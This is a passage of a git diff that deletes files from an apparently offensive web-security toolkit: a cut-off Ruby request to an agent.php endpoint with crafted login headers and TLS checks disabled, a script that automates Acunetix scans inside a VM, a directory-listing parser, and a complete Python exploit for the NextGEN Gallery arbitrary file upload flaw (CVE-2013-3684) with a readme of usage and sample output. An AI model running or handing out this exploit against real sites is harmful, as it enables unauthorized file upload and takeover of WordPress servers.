URI.parse('https://'+hostandport+'/enterprise/control/agent.php ') -http4 = Net::HTTP.new(url4.host, url4.port) -http4.use_ssl = true -http4.verify_mode = OpenSSL::SSL::VERIFY_NONE -data4 = '' - -headers4 = { - 'HTTP_AUTH_LOGIN' => stage4, - 'HTTP_AUTH_PASSWD' => "spiderlabs", - 'Host' => hostandport, - 'Content-Type' => 'text/xml' -} -resp4 = http4.post(url4.path, data4, headers4) -results4 = resp4.body diff --git a/vm_automation/README.md b/vm_automation/README.md deleted file mode 100755 index f991f74..0000000 --- a/vm_automation/README.md +++ /dev/null @@ -1,16 +0,0 @@ -- vmAcunetix.py - -Starts up the VM (background optional with the -nogui parameter to improve performance) -Launches Acunetix and scans the URLs listed in the text files. - ``` -usage: vmAcunetix.py [-h] [-u USERNAME] [-p PASSWORD] [-iL FILENAME] [-nogui] - [-n THREADS] - -optional arguments: - -h, --help show this help message and exit - -u USERNAME [username to use to login into VM] - -p PASSWORD [password to use to login into VM] - -iL FILENAME [text file containing list of URLs] - -nogui [starts VM with no gui] - -n THREADS [number of threads] -``` diff --git a/vm_automation/vmAcunetix.py b/vm_automation/vmAcunetix.py deleted file mode 100755 index 311bc68..0000000 --- a/vm_automation/vmAcunetix.py +++ /dev/null @@ -1,210 +0,0 @@ -import multiprocessing -import os -import commands -import glob -import argparse -import sys -import urllib2 - -noGUI=False -numProcesses=5 -username='' -password='' -filename='' - -#Change the below and point to the VMX file of the VM -vmHost='"/VM/XPLiteVM.vmwarevm/XPLiteVM.vmx"' - -acunetixCmd = '"C:\Program Files\Acunetix\Web Vulnerability Scanner 9.5\wvs_console.exe"' -vmrunCmd='"/Applications/VMware Fusion.app/Contents/Library/vmrun"' -cmdList=[] - -fileList=[] -mkdirList=[] - -def chunk(input, size): - return map(None, *([iter(input)] * size)) - - -class Worker1(multiprocessing.Process): - - def __init__(self, - work_queue, - result_queue, - ): - multiprocessing.Process.__init__(self) - self.work_queue = work_queue - self.result_queue = result_queue - self.kill_received = False - def run(self): - while (not (self.kill_received)) and (self.work_queue.empty()==False): - try: - job = self.work_queue.get_nowait() - except: - break - (jobid,filename) = job - rtnVal = (jobid,generateAcunetix(filename)) - self.result_queue.put(rtnVal) - -def execute1(jobs, num_processes=2): - work_queue = multiprocessing.Queue() - for job in jobs: - work_queue.put(job) - - result_queue = multiprocessing.Queue() - worker = [] - for i in range(int(num_processes)): - worker.append(Worker1(work_queue, result_queue)) - worker[i].start() - - results = [] - while len(results) < len(jobs): - result = result_queue.get() - results.append(result) - results.sort() - return (results) - -def testInternet(): - cmd = "ping -c3 4.2.2.2 > /dev/null 2>&1" - if os.system(cmd)==0: - return True - else: - print "[!] Internet is down. Please check" - sys.exit() - return False - -def RunCommand(fullCmd): - try: - return commands.getoutput(fullCmd) - except Exception as e: - print e - return "Error executing command %s" %(fullCmd) - -def get_redirected_url(url): - try: - opener = urllib2.build_opener(urllib2.HTTPRedirectHandler) - opener.addheaders = [('User-agent', 'Mozilla/5.0')] - urllib2.install_opener(opener) - request = opener.open(url) - return request.url - except Exception as e: - return None - -def checkWorkDone(folderName): - #print folderName+'/wvs_log*.csv' - files = glob.glob(folderName+'/wvs_log*.csv') - complete=False - for name in files: - with open(name) as f: - textList=f.read() - for line in textList: - if "Finish time :" in line: - #if "Scan was aborted : NO" in line: - completed=True - if complete==True: - return True - else: - return False - -def generateAcunetix(line): - line1 = (line.replace(":","_")).replace("//","") - shareName = line1 - folderName = "/results/"+line1 - folderName1 = (folderName.replace("/","\\")).replace("results","") - - #Enable Shared Folders - cmd = vmrunCmd+' enableSharedFolders '+vmHost - RunCommand(cmd) - - if checkWorkDone(os.getcwd()+folderName)==False and testInternet()==True: - cmd = vmrunCmd+' addSharedFolder '+vmHost+' '+shareName+' '+os.getcwd()+folderName - print cmd - RunCommand(cmd) - - if noGUI==True: - cmd = vmrunCmd+' -T fusion -gu '+username+' -gp '+password+' runProgramInGuest '+vmHost+' -interactive '+acunetixCmd+' /save /savefolder z:'+folderName1+' /Scan '+line+" nogui" - print cmd - RunCommand(cmd) - else: - cmd = vmrunCmd+' -T fusion -gu '+username+' -gp '+password+' runProgramInGuest '+vmHost+' -interactive '+acunetixCmd+' /save /savefolder z:'+folderName1+' /Scan '+line - print cmd - RunCommand(cmd) - - #Remove Shares in VMware - cmd = vmrunCmd+' removeSharedFolder '+vmHost+' '+shareName - RunCommand(cmd) - - - -if __name__ == '__main__': - global numProcess - parser = argparse.ArgumentParser() - parser.add_argument('-u', dest='username', action='store', help='[username to use to login into VM]') - parser.add_argument('-p', dest='password', action='store', help='[password to use to login into VM]') - parser.add_argument('-iL', dest='filename', action='store', help='[text file containing list of URLs]') - parser.add_argument('-nogui', action='store_true', help='[starts VM with no gui]') - parser.add_argument('-n', dest='threads', action='store', help='[number of threads]') - - if len(sys.argv)==1: - parser.print_help() - sys.exit(1) - options = parser.parse_args() - if options.username and options.password and options.filename: - username = options.username - password = options.password - - if options.threads: - numProcesses=options.threads - if options.nogui: - noGUI=True - if options.filename: - filename=options.filename - fileList.append(filename) - - if testInternet()==False: - print "[!] Internet is down. Please check" - sys.exit() - - #Starts VM - print "- Starts VM" - cmd = vmrunCmd+' start '+vmHost - RunCommand(cmd) - - fileList1=[] - for filename in fileList: - with open(filename) as f: - lines = f.read().splitlines() - for line in lines: - line = get_redirected_url(line) - if line!=None: - line1 = (line.replace(":","_")).replace("//","") - shareName = line1 - folderName = "/results/"+line1 - - if not os.path.exists(os.getcwd()+"/"+folderName+"/scan-results.wvs"): - fileList1.append(line) - - #Remove Shares in VMware - #cmd = vmrunCmd+' removeSharedFolder '+vmHost+' '+shareName - #RunCommand(cmd) - - if not os.path.exists(os.getcwd()+"/"+folderName): - os.makedirs(os.getcwd()+"/"+folderName) - - - print "- Slicing cmdList into chunks" - tempList = chunk(fileList1, int(numProcesses)) - totalCount=len(tempList) - count = 1 - for fileList in tempList: - jobs = [] - jobid=0 - print "- Set "+str(count)+" of "+str(totalCount) - for filename in fileList: - if filename!=None: - print "- Testing: "+filename - jobs.append((jobid,filename)) - jobid = jobid+1 - resultsList = execute1(jobs,numProcesses) - - diff --git a/web/parseFileList.py b/web/parseFileList.py deleted file mode 100755 index 4b2aacf..0000000 --- a/web/parseFileList.py +++ /dev/null @@ -1,31 +0,0 @@ -#!/usr/bin/python -import argparse -import sys - -if __name__ == '__main__': - parser = argparse.ArgumentParser() - - parser.add_argument('-f', action='store', help='[file containing directory listing]') - - if len(sys.argv)==1: - parser.print_help() - sys.exit(1) - - options = parser.parse_args() - if options.f: - with open(options.f) as f: - content = f.readlines() - fullPath = '' - for i in content: - i = i.strip() - if '/' in i: - fullPath = i.replace(":","") - elif "total " in i or len(i)<1: - continue - else: - pathSplit = i.split(" ") - try: - if len(pathSplit)<12: - print fullPath+"/"+pathSplit[10] - except IndexError: - continue diff --git a/wordpress_exploits/cve-2013-3684.py b/wordpress_exploits/cve-2013-3684.py deleted file mode 100755 index e1b543e..0000000 --- a/wordpress_exploits/cve-2013-3684.py +++ /dev/null @@ -1,83 +0,0 @@ -#!/usr/bin/python -# -*- coding: utf-8 -*- -import httplib, mimetypes,urllib2 - - -def exists(url): - try: - r = urllib2.urlopen(url) - except urllib2.URLError as e: - r = e - return r.code == 200 - -def post_multipart(host, uri, fields, files): - content_type, body = encode_multipart_formdata(fields, files) - h = httplib.HTTPConnection(host) - headers = { - 'User-Agent': 'INSERT USERAGENTNAME', - 'Content-Type': content_type - } - h.request('POST', uri, body, headers) - res = h.getresponse() - return res.status, res.reason, res.read() - -def encode_multipart_formdata(fields, files): - """ - fields is a sequence of (name, value) elements for regular form fields. - files is a sequence of (name, filename, value) elements for data to be uploaded as files - Return (content_type, body) ready for httplib.HTTP instance - """ - BOUNDARY = '----------bound@ry_$' - CRLF = '\r\n' - L = [] - for (key, value) in fields: - L.append('--' + BOUNDARY) - L.append('Content-Disposition: form-data; name="%s"' % key) - L.append('') - L.append(value) - for (key, filename, value) in files: - L.append('--' + BOUNDARY) - L.append('Content-Disposition: form-data; name="%s"; filename="%s"' % (key, filename)) - L.append('Content-Type: image/gif') - L.append('') - L.append(value) - L.append('--' + BOUNDARY + '--') - L.append('') - body = CRLF.join(L) - content_type = 'multipart/form-data; boundary=%s' % BOUNDARY - return content_type, body - - -if __name__ == '__main__': - import argparse - parser = argparse.ArgumentParser(__file__) - parser = argparse.ArgumentParser(description="NextGEN Gallery 1.9.12 Arbitrary File Upload (CVE-2013-3684)") - parser.add_argument('-i','--ip', help='IP address or host name', required=True) - parser.add_argument('-u','--uri', help='URI path /wordpress', required=True) - parser.add_argument('-f','--file', help='File to upload', required=True) - args = vars(parser.parse_args()) - - if args['ip']!=None and args['uri']!=None: - uriPath = 'http://'+args['ip']+args['uri']+'/wp-content/plugins/nextgen-gallery/' - if(exists(uriPath)): - print "[*] Wordpress Plugin: NextGEN Gallery found" - - f = open(args['file'],"r") - inputData = f.read() - f.close() - - data = [('name','name'),('galleryselect','1')] - file = [('Filedata','file1.gif',inputData)] - if "?p=1&nggupload=" not in args['uri']: - uri = args['uri']+"/?p=1&nggupload=" - else: - uri = args['uri'] - response = post_multipart(args['ip'],uri,data,file) - if response[0]==200: - print "[*] File has been uploaded successfully. Please check the below location\n" - print "******************************************************************************" - print "http://"+args['ip']+uri.strip("?p=1&nggupload=")+"wp-content/[gallery_name]/file1.gif" - print "******************************************************************************" - else: - print "[*] Wordpress Plugin: NextGEN Gallery NOT found" - diff --git a/wordpress_exploits/readme.txt b/wordpress_exploits/readme.txt deleted file mode 100755 index 1b33545..0000000 --- a/wordpress_exploits/readme.txt +++ /dev/null @@ -1,46 +0,0 @@ -[The below example shows the help menu] --------------------------------------------------------------------------------------------------- -python cve-2013-3684.py -i 127.0.0.1 -u /wordpress/wordpress -h -usage: cve-2013-3684.py [-h] -i IP -u URI - -NextGEN Gallery 1.9.12 Arbitrary File Upload (CVE-2013-3684) -optional arguments: - -h, --help show this help message and exit - -i IP, --ip IP IP address or host name - -u URI, --uri URI URI path /wordpress - -f FILE, --file FILE File to upload --------------------------------------------------------------------------------------------------- - - -[The below example shows that NextGEN Gallery is found on host but attempt is successful] --------------------------------------------------------------------------------------------------- -python cve-2013-3684.py -i 127.0.0.1 -u /wordpress/wordpress -f test.txt -[*] Wordpress Plugin: NextGEN Gallery found -[*] File has been uploaded successfully. Please check the below location - -****************************************************************************** -http://127.0.0.1/wordpress/wordpress/wp-content/[gallery_name]/file1.gif -****************************************************************************** --------------------------------------------------------------------------------------------------- - - --------------------------------------------------------------------------------------------------- -[The below example shows that NextGEN Gallery is found on host but attempt is unsuccessful] - -python cve-2013-3684.py -i 127.0.0.1 -u /wordpress/wordpress -f test.txt -[*] Wordpress Plugin: NextGEN Gallery found -[*] Failed: NextGEN Gallery is not vulnerable or attempt has been blocked -****************************************************************************** -(406, 'Not Acceptable', 'Not Acceptable!

Not Acceptable!

An appropriate representation of the requested resource could not be found on this server. This error was generated by Mod_Security.

') -****************************************************************************** --------------------------------------------------------------------------------------------------- - - --------------------------------------------------------------------------------------------------- -[The below example shows that NextGEN Gallery is not found on host] - -python cve-2013-3684.py -i 127.0.0.1 -u /wordpress/wordpress1 -[*] Wordpress Plugin: NextGEN Gallery NOT found --------------------------------------------------------------------------------------------------- - -